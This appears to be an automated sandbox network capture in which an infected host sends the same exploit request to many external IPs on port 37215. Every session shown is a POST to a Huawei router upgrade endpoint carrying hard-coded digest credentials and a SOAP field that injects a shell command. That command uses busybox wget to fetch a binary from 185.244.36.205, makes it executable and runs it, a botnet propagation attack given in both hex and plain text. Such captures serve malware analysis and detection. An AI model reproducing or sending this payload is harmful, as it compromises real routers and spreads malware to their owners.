                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1563192.168.2.1540196181.190.250.14937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644782066 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1564192.168.2.1546580156.123.49.3637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644782066 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1565192.168.2.156091845.69.243.8337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644815922 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1566192.168.2.1560948181.107.199.2937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644824028 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1567192.168.2.1553572157.138.92.3437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644841909 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1568192.168.2.1542816121.150.109.2537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644859076 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1569192.168.2.1545148181.135.155.17237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644889116 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1570192.168.2.155986231.71.21.18937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644902945 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1571192.168.2.1539326138.111.105.7137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644926071 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1572192.168.2.154388831.44.151.14037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644928932 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
